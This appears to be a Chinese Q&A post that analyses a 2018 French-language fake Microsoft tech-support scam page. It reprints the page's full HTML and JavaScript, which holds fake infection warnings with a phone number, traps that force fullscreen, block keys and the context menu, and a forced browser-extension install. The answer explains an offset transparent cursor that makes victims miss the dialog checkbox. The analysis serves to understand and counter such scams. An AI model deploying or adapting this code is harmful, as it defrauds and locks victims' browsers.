技术支持诈骗者总是想方设法让窗口难以关闭,以达到诈骗目的。
在本例中,部分代码的目的是让用户难以勾选“防止此页面创建其他对话框”这个复选框;如果能够勾选,受害者本可以直接关闭该窗口。鼠标光标显示异常,使受害者很难把指针移到复选框上。我不明白这是如何实现的:
我删掉了该页面中的一大段数据(blob),但完整版本可以在此处找到:https://pastebin.com/E57AQjGj
供以后的访客参考:这是加上灰色背景后的光标图像(背景原本是透明的),依据 Tschallacka 的回答:
这是截至2018年5月的典型Microsoft技术支持骗局的代码:
<html xmlns="http:/www.w3.org/1999/xhtml">
<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title> Information </title>
<link href="index_files/bootstrap.css" rel="stylesheet">
<link href="index_files/style.css" rel="stylesheet">
<link href="index_files/translator.css" id="SL_Style" type="text/css" rel="stylesheet">
<link href="index_files/alert.css" rel="stylesheet">
<link href="https://chrome.google.com/webstore/detail/ghbmnnjooekpmoecnnnilnnbdlolhkhi" rel="chrome-webstore-item">
<style>
html {
overflow: hidden;
}
</style>
<script>
/*
window.alert = function(al) {
return function(msg) {
al(msg);
var event = new CustomEvent('alert_clicked');
document.dispatchEvent(event);
};
}(window.alert);
document.addEventListener('alert_clicked', function() {
setTimeout(function() {
toggleFullScreen();
}, 1000)
}, false);
*/
</script>
<script>
/**
 * Returns the URI-decoded value of a query-string parameter, or '' when the
 * parameter is absent.
 *
 * Reviewer note: `name` is placed into the regular expression unescaped and
 * the pattern is not anchored to a parameter boundary, so the lookup matches
 * the first "<name>=" substring anywhere in location.search. The returned
 * value is attacker-controllable URL data.
 *
 * @param {string} name - parameter name to look up in location.search
 * @returns {string} decoded value, or an empty string
 */
function getURLParameter(name) {
  var pattern = new RegExp(name + '=' + '(.+?)(&|$)');
  var match = pattern.exec(location.search);
  var raw = match ? match[1] : null;
  return decodeURI(raw || '');
}
// Global holding the "error" query parameter; the redirect script near the
// end of the page appends it to the rebuilt URL.
var error = getURLParameter('error');
</script>
<audio id="play" loop><source src="fr.mp3" type="audio/mpeg"></audio>
<!--<audio autoplay="autoplay" loop="">
<source src="index_files/gb.mp3" type="audio/mpeg">
</audio>-->
<script type="text/javascript">
// Markup string that the key and click handlers assign to #map.innerHTML.
// The inline JPEG data here is only a stub (NOTE(review): the surrounding
// text says a large blob was removed from the listing).
var stroka = "<tr><td valign='top'><table width='100%' height='61' cellpadding='0' cellspacing='0' border='0'><tr><td width='766'><img src='data:image/jpeg;base64,/Z'></td></tr></table></td></tr>";
</script>
<script type="text/javascript">
/**
 * Requests fullscreen on the root element when the document is not already
 * fullscreen. Despite the name there is no exit branch: if a fullscreen
 * element exists the function does nothing.
 * Tries the unprefixed API first, then the moz- and webkit-prefixed ones.
 */
function toggleFullScreen() {
// Act only when none of the fullscreen-element properties is set.
if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
if (document.documentElement.requestFullscreen) {
document.documentElement.requestFullscreen();
} else if (document.documentElement.mozRequestFullScreen) {
document.documentElement.mozRequestFullScreen();
} else if (document.documentElement.webkitRequestFullscreen)
{document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
}
}
}
</script>
<script type="text/javascript">
// Analyst note: keyCode 27 is Escape, the key browsers use to leave
// fullscreen. When it is released the page asks for fullscreen again.
document.addEventListener('keyup', function(es) {
if (es.keyCode === 27) {
toggleFullScreen();
}
}, false);
</script>
<script type="text/javascript">
// Analyst note: keyCodes 122, 17, 18 and 13 are F11, Ctrl, Alt and Enter.
// Releasing any of them redraws the #map banner and re-requests fullscreen.
document.addEventListener('keyup', function(e) {
if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
document.getElementById('map').innerHTML = stroka;
toggleFullScreen();
}
}, false);
</script>
<script type="text/javascript">
// Click trap: on page load, install a document-wide click handler.
// NOTE(review): a later script in this page assigns window.onload again; that
// assignment replaces this one before the load event fires, so this handler
// is probably never installed in the page as listed.
window.onload = function () {
document.onclick = function (e) {
e = e || event;
// `target` is assigned without a declaration, so it is an implicit global.
target = e.target || e.srcElement;
// Both branches below are identical; the DIV test changes nothing.
if (target.tagName === "DIV") {
toggleFullScreen();
// "Blocked" cursor plus the banner markup from `stroka`.
document.body.style.cursor = 'not-allowed';
document.getElementById('map').innerHTML = stroka;
// No element with id 'fa' appears in this listing, so this line would throw
// if reached (NOTE(review): confirm against the full page). The iframe is
// 12x12 and positioned off-screen; its src is '#' in this copy.
document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
} else {
toggleFullScreen();
document.body.style.cursor = 'not-allowed';
document.getElementById('map').innerHTML = stroka;
document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
}
}
}
</script>
<script type="text/javascript">
// Window-level click handler: redraws the banner, starts the looping audio
// element with id "play", and requests fullscreen.
addEventListener("click", function() {
document.getElementById('map').innerHTML = stroka;
document.getElementById("play").play();
// isFullScreen is a global assigned once in a later script of this page; it
// is not refreshed here, so it reflects the state at the time that script ran.
if (!isFullScreen) {
var el = document.documentElement,
// Picks the first defined of three request functions; if none is defined,
// rfs is undefined and the call below throws.
rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
rfs.call(el);
}
});
</script>
</head>
<body onkeydown="return hCPNapvlhFicLoDm(event)" oncontextmenu="return false" style="cursor: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=") 128 128, crosshair;">
<!-- <canvas id="canvasElement"></canvas> -->
<audio autoplay="autoplay" loop="">
<source src="fr.mp3" type="audio/mpeg">
</audio>
<div id="coFrameDiv" style="height:0px;display:none;">
<iframe id="coToolbarFrame" src="index_files/a.htm" style="height:0px;width:100%;display:none;"></iframe>
</div>
<a id="elem" href="#" style="display: none;"></a>
<span id="audioarea"></span>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td valign="top" align="center"><div id="map"></div>
</td>
</tr>
</tbody>
</table>
<nav class="navbar navbar-default navbar-static-tops">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">
<img src="index_files/windows.png" alt="Windows">
</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Store<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">Téléchargement </a></li>
<li><a href="#">Devices</a></li>
<li><a href="#">Software</a></li>
<li><a href="#">Apps</a></li>
<li><a href="#">Games</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Products<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">Software & services</a></li>
<li><a href="#">Devices & Xbox</a></li>
<li><a href="#">For business</a></li>
</ul>
</li>
<li><a href="#">Support</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="#"><strong>Support technique : 09 70 38 74 17</strong></a></li>
</ul>
</div><!--/.nav-collapse-->
</div>
</nav>
<div class="container">
<div class="jumbotron">
<div class="row">
<div class="col-xs-6 text-left">
<h2>Attention</h2>
Ne pas éteindre ou réinitialiser votre ordinateur.
</br></br>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</div>
</div>
</div>
</div>
<footer class="footer">
<div class="container">
<div class="row">
<div class="col-md-4" style="text-align:left;">
<h4>Support</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Account support</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Supported products list</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Product support lifecycle</a></li>
</ul>
</div>
<div class="col-md-4" style="text-align:left;">
<h4>Security</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Safety & Security Center</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Download Security Essentials</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Malicious Software Removal Tool</a></li>
</ul>
</div>
<div class="col-md-4" style="text-align:left;">
<h4>Popular topics</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Report a support scam</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Disability Answer Desk</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Locate Windows addresses worldwide</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Windows 10 help & how-to</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help & how-to</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10,
Windows 8, or WIndows 7?</a></li>
</ul>
</div>
</div>
<div class="row" style="font-size: 1.2rem; padding:30px 0px;">
<div style="float:left;"><span class="glyphicon glyphicon-cd"></span><span>English(United States)</span>
</div>
<div style="float:right;">
<span style="padding:0px 15px;">Terms of use</span>
<span style="padding:0px 15px;">English(United States)</span>
<span style="padding:0px 15px;">Trademarks</span>
<span style="padding:0px 15px;">@2016 Windows</span>
</div>
</div>
</div>
</footer>
<div id="chrome-alerts" class="chrome-alert">
<div>
<a href="javascript:openlink()" class="cross">×</a>
<h1>Attention</h1>
<div class="content-box" id="alert-content-box">
<p>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</p>
</div>
<label style="font-size: 12px;"><input type="checkbox"> Empêcher les boîtes de dialogue supplémentaires</label>
<div class="action_buttons">
<a class="active" id="leave_page">OK</a>
</div>
</div>
</div>
<script>
// Tracking values consumed by the install flow's callback requests.
// NOTE(review): `postback` looks like a campaign/affiliate token — an
// assumption from its use as a URL suffix, not something the listing states.
var subid = '';
var clickid = '';
var postback = 'wHBAN004C9IFC3951PRAFUP0';
// Set to true while the install flow is running; read by the blur handler.
var cl = false;
// Snapshot of the fullscreen state taken once, when this script executes.
var isFullScreen = !(!document.fullscreenElement && !document.msFullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement);
// Load handler for the extension-install lure. This assignment replaces any
// earlier window.onload assignment made by scripts in the page head.
window.onload = function () {
// Per-language lure text. The `ru` strings are question marks in this listing
// (mis-encoded in the copy); de and fr reuse the English body text.
var langs = {
en: {
img: 'ru_new.png',
h3: 'System notification!',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
ru: {
img: 'ru_new.png',
h3: '????????? ???????????!',
p: '???????????? ???????? ? ????????? ??????? ?????????? ??? ?????? ????????. ??????? "??" ? ?????????? ???????????? ??????????.'
},
de: {
img: 'ru_new.png',
h3: 'Systembenachrichtigung!',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
fr: {
img: 'ru_new.png',
h3: 'Avis de système !',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
es: {
img: 'ru_new.png',
h3: '¡Notificación del sistema!',
p: 'Se está realizando la descarga e instalación de una extensión importante para su navegador. Haga clic en "Aceptar" e instale la extensión propuesta.'
},
pt: {
img: 'ru_new.png',
h3: 'Mensagem de sistema!',
p: 'Importantes adições para o seu navegador estão sendo transferidas ea instalação está em andamento. Pressione OK e instale as extensões!'
},
};
// Gate: the lure only runs where Chrome's inline-install API is exposed.
// NOTE(review): Chrome has since removed chrome.webstore.install, so a
// current browser would take the else branch — confirm for the version
// under analysis.
if (window.chrome !== undefined && window.chrome.webstore && window.chrome.webstore.install) {
// Marker cookie (24 h) set on first visit.
if (document.cookie.indexOf('tmp_name=') == -1) {
setCookie('tmp_name', 'landing', 24);
}
// Exact-key lookup: a value such as "en-US" does not match the key "en".
var lang = langs[navigator.language];
hTRnKeAy1lgYB4La();
if (lang) {
// No <header> element or .gR3SfJr5l9O4jbWa class appears in this listing, so
// these lookups would return null here (NOTE(review): the markup may belong
// to a different template that shares this script).
document.querySelector('header img').src = lang.img;
document.querySelector('.gR3SfJr5l9O4jbWa h3').innerText = lang.h3;
document.querySelector('.gR3SfJr5l9O4jbWa p').innerText = lang.p;
}
// First pass only: set a 1 h cookie and reload the same URL.
if (document.cookie.indexOf('c_open' + '=') === -1) {
setCookie('c_open', 'landing', 1);
window.location.href = window.location.href;
}
// Errors from missing elements are swallowed.
try {
document.querySelector('footer').style.display = 'none';
document.querySelector('header').style.display = 'block';
} catch (e) {}
} else {
// Non-matching browser: drop the leave-page prompt and navigate to '#'.
window.onbeforeunload = null;
location.assign('#');
}
};
// On resize, swap header/footer visibility depending on whether the viewport
// height equals the screen height (the page's own test for fullscreen).
// Does nothing when the document has no <header> element.
window.onresize = function () {
if (document.querySelector('header')) {
if (window.innerHeight != screen.height) {
document.querySelector('header').style.display = 'block';
document.querySelector('footer').style.display = 'none';
}
else {
document.querySelector('header').style.display = 'none';
document.querySelector('footer').style.display = 'block';
}
}
};
// Returning a value from onbeforeunload makes the browser show its
// leave-page confirmation when the tab is closed or navigated away.
// Other code in this script sets the handler back to null before it
// navigates on purpose.
window.onbeforeunload = function (ev) {
return "You have to install extension !";
};
// Handler registered on body for keyup and click (see the addEventListener
// calls later in this script): runs the install flow, then one second later
// requests webkit-prefixed fullscreen on <body>.
function kzogExQSrDChY4Iq() {
eKxJS2GzrfWPEjgm();
setTimeout(function () {
document.body.webkitRequestFullscreen();
}, 1000);
}
/**
 * Writes a cookie for path "/" and logs the computed expiry attribute.
 *
 * @param {string} a - cookie name
 * @param {string} b - cookie value (written as-is, not encoded)
 * @param {number} c - lifetime in hours; falsy means a session cookie
 */
function setCookie(a, b, c) {
  var expiresAttr = '';
  if (c) {
    // Lifetime is given in hours and converted to milliseconds.
    var expiry = new Date();
    expiry.setTime(expiry.getTime() + (c * 60 * 60 * 1000));
    expiresAttr = '; expires=' + expiry.toUTCString();
  }
  console.log(expiresAttr);
  var pair = a + "=" + b;
  document.cookie = pair + expiresAttr + ";path=/";
}
// If both the c_name and tmp_name cookies exist, drop the leave-page prompt
// and navigate to '#'. Nothing in this listing sets c_name (only tmp_name and
// c_open are written), so the condition depends on code not shown here.
function hTRnKeAy1lgYB4La() {
if (document.cookie.indexOf('c_name' + '=') !== -1 && document.cookie.indexOf('tmp_name=') !== -1) {
window.onbeforeunload = null;
location.assign('#');
}
}
// Shows <footer> and hides <header>; any error (for example a missing
// element) is swallowed.
function gpAkSJDl9ENT5gLQ() {
try {
document.querySelector('footer').style.display = 'block';
document.querySelector('header').style.display = 'none';
} catch (e) {}
}
/**
 * Install flow. Visible steps:
 *  1. swap header/footer via gpAkSJDl9ENT5gLQ() and try to leave fullscreen;
 *  2. send a GET request and set cl = true;
 *  3. call chrome.webstore.install('') with a success and a failure callback.
 * Every request and navigation target below is '#' in this listing, so the
 * real endpoints cannot be recovered from this copy (NOTE(review): presumably
 * scrubbed by whoever posted it). The nested onload/onerror handlers all end
 * in open('#', '_self'): the tab is navigated whatever each request returns.
 */
function eKxJS2GzrfWPEjgm() {
gpAkSJDl9ENT5gLQ();
// Both exit calls are wrapped so that a missing API does not stop the flow.
try {
document.webkitCancelFullScreen();
} catch (e) { }
try {
document.cancelFullscreen();
} catch (e) { }
// Fire-and-forget request; no handlers are attached.
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.send();
// While cl is true the window blur handler does not reload the page.
cl = true;
// Empty string is passed as the item URL argument.
chrome.webstore.install('', function () {
// Success callback: remove the leave-page prompt, then report and navigate.
window.onbeforeunload = null;
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.onload = function () {
// Reporting branch is chosen by the first non-empty of clickid, subid,
// postback. With clickid, three requests are chained one after another.
if (clickid) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#', true);
xhrPostback.onload = function () {
var xhrPostback1 = new XMLHttpRequest();
xhrPostback1.open('GET', '#', true);
xhrPostback1.onload = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.onerror = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.send();
};
// Error path repeats the same chain as the load path above.
xhrPostback.onerror = function () {
var xhrPostback1 = new XMLHttpRequest();
xhrPostback1.open('GET', '#', true);
xhrPostback1.onload = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.onerror = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.send();
};
xhrPostback.send();
} else if (subid) {
// subid is appended to the request URL.
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#' + subid, true);
xhrPostback.onload = function () {
open('#', '_self');
};
xhrPostback.onerror = function () {
open('#', '_self');
};
xhrPostback.send();
} else if (postback) {
// postback is appended to the request URL; with the globals as listed
// (empty clickid and subid) this is the branch that runs.
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#' + postback, true);
xhrPostback.onload = function () {
open('#', '_self');
};
xhrPostback.onerror = function () {
open('#', '_self');
};
xhrPostback.send();
} else {
open('#', '_self');
}
};
xhr.onerror = function () {
open('#', '_self');
};
xhr.send();
}, function (error) {
// Failure callback: re-arm the blur reload (cl = false), send another
// request, log the error and put the header lure back on screen.
cl = false;
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.send();
console.log(error);
document.querySelector('footer').style.display = 'none';
try {
document.querySelector('header').style.display = 'block';
} catch (v) {
}
// Leave fullscreen 100 ms later; both calls are best-effort.
setTimeout(function () {
try {
document.webkitCancelFullScreen();
} catch (e) { }
try {
document.cancelFullscreen();
} catch (e) { }
}, 100);
});
}
// Keydown filter referenced by the <body onkeydown="return ..."> attribute.
// Returns false for key codes 123 (F12) and 17 (Ctrl), which cancels the
// key's default action; returns undefined for every other key.
function hCPNapvlhFicLoDm(e) {
if (e.which === 123 || e.which === 17) {
return false;
}
}
// Shows a confirm() dialog and calls itself again until the user accepts.
// The only reference to it in this listing is a commented-out call, so it
// is not invoked by the page as shown.
function hxvw7JrbMUZBqVhN() {
var c = confirm("You should install the chrome extension!");
if (!c) {
hxvw7JrbMUZBqVhN();
}
}
// Any key release or click anywhere in <body> starts the install flow.
// The first registration below is disabled in the original.
// document.body.addEventListener('keyup', f5WOxk2dF74GMRLf);
document.body.addEventListener('keyup', kzogExQSrDChY4Iq);
document.body.addEventListener('click', kzogExQSrDChY4Iq);
// Stub that always returns false; its only registration in this listing is
// commented out.
function f5WOxk2dF74GMRLf() {
return false;
}
// Mouse-leave detector: when the related target is missing or is the <html>
// node, the page reloads itself. Its registration (a mouseout listener) is
// commented out in this listing, so it is not active as shown.
function dsfsf(e) {
e = e ? e : window.event;
var from = e.relatedTarget || e.toElement;
if (!from || from.nodeName === "HTML") {
// hxvw7JrbMUZBqVhN()
window.location.href = window.location.href;
}
}
/**
 * Registers an event handler, preferring the standard DOM API and falling
 * back to the legacy attachEvent form. Does nothing if neither exists.
 *
 * @param {Object} obj - event target
 * @param {string} evt - event name without the "on" prefix
 * @param {Function} fn - handler
 */
function addEvent(obj, evt, fn) {
  if (obj.addEventListener) {
    obj.addEventListener(evt, fn, false);
    return;
  }
  if (obj.attachEvent) {
    obj.attachEvent("on" + evt, fn);
  }
}
/**
 * Unregisters an event handler, preferring the standard DOM API and falling
 * back to the legacy detachEvent form. Does nothing if neither exists.
 *
 * @param {Object} obj - event target
 * @param {string} evt - event name without the "on" prefix
 * @param {Function} fn - handler to remove
 */
function removeEvent(obj, evt, fn) {
  if (obj.removeEventListener) {
    obj.removeEventListener(evt, fn, false);
    return;
  }
  if (obj.detachEvent) {
    obj.detachEvent("on" + evt, fn);
  }
}
//addEvent(document, "mouseout", dsfsf);
// When the window loses focus, reload the same URL unless the page recorded
// fullscreen at script start (isFullScreen) or the install flow is running
// (cl).
window.onblur = function() {
if (!isFullScreen && !cl) {
window.location.href = window.location.href;
}
};
</script>
<script type="text/javascript">
// Self-redirect: when the query string carries red=y, rebuild the URL on the
// same host and path with only the n and error parameters, over https.
// Both values come from the query string and are concatenated without
// encoding.
var nomer = getURLParameter("n");
var red = getURLParameter("red");
if (red === "y") {
document.location.href=("https://" + document.location.host + document.location.pathname + "?n=" + nomer + "&error=" + error);
}
</script>
<script type="text/javascript">var _Hasync= _Hasync|| [];
// Third-party hit counter: queues three commands, then appends an async
// script tag that loads the counter code from the histats host below.
// The numeric id in the start command is the same one used in the
// <noscript> image URL that follows this script.
_Hasync.push(['Histats.start', '1,3638954,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
// Appended to <head>, or to <body> when no <head> element is found.
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img src="//sstatic1.histats.com/0.gif?3638954&101" alt="free hit counter code" border="0"></a></noscript>
</body>
</html>
解决方法:
他们的做法是把鼠标光标替换成一张 128x128 像素的图像。
请查看下面的代码片段,并将鼠标悬停在按钮上。
这样一来,实际点击的位置并不是您以为的位置:光标图像的背景是透明的,真正的点击点(热点,即 CSS 中 url() 之后的两个坐标)与您看到的箭头并不重合。您看不到真正的点击位置,所以总是点不中那个很小的复选框。
/* Demo of the trick on a plain button: a PNG data URI is used as the cursor.
   The two numbers after url() are the hotspot x and y coordinates, i.e. the
   pixel of the image that counts as the click point; crosshair is the
   fallback cursor when the image cannot be used. */
button {
cursor: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=") 128 128, crosshair;
}
<button>
test
</button>